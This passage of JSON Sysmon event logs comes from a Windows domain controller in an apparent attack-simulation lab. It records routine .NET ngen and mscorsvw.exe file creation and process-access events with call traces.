{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7932,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:18.872\r\nProcessGuid: {A837DB8D-04F2-5F25-0000-00101C251200}\r\nProcessId: 3252\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cb4-0\\System.Windows.Input.Manipulations.dll\r\nCreationUtcTime: 2020-08-01 06:00:18.872","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:18.872","ProcessGuid":"{A837DB8D-04F2-5F25-0000-00101C251200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cb4-0\\System.Windows.Input.Manipulations.dll","CreationUtcTime":"2020-08-01 06:00:18.872","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7933,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:18.903\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-0010625E1100}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:18.903","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-0010625E1100}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7934,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:18.903\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-0010625E1100}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:18.903","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-0010625E1100}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7935,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:18.918\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04F2-5F25-0000-001074281200}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:18.918","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04F2-5F25-0000-001074281200}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7936,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:18.965\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-0010F2581100}\r\nTargetProcessId: 2276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:18.965","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-0010F2581100}","TargetProcessId":"2276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7937,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:18.965\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-0010F2581100}\r\nTargetProcessId: 2276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:18.965","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-0010F2581100}","TargetProcessId":"2276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7938,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:18.965\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-0010F2581100}\r\nTargetProcessId: 2276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:18.965","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-0010F2581100}","TargetProcessId":"2276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7939,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:19.043\r\nProcessGuid: {A837DB8D-04F2-5F25-0000-0010392C1200}\r\nProcessId: 2276\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\8e4-0\\System.Windows.Presentation.dll\r\nCreationUtcTime: 2020-08-01 06:00:19.043","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:19.043","ProcessGuid":"{A837DB8D-04F2-5F25-0000-0010392C1200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\8e4-0\\System.Windows.Presentation.dll","CreationUtcTime":"2020-08-01 06:00:19.043","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7940,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:19.075\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04F3-5F25-0000-001039311200}\r\nTargetProcessId: 5116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:19.075","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04F3-5F25-0000-001039311200}","TargetProcessId":"5116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\